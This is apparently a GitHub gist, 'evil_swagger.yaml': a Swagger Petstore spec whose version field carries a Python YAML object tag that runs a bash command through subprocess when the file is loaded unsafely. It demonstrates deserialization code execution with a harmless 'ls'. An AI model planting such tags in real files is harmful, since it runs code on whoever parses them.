Skip to content

Instantly share code, notes, and snippets.

Avatar

Stefan Nordhausen snordhausen

View GitHub Profile
@snordhausen
snordhausen / evil_swagger.yaml
Last active Jan 25, 2018
Evil swagger yaml
View evil_swagger.yaml
---
swagger: !!python/object/new:subprocess.check_output [["bash", "-c", "ls -l>&2; echo -n 2.0"]]
info:
version: "1.0.0"
title: "Swagger Petstore"
host: "evil.invalid"
schemes:
- "http"
consumes:
- "application/json"
You can’t perform that action at this time.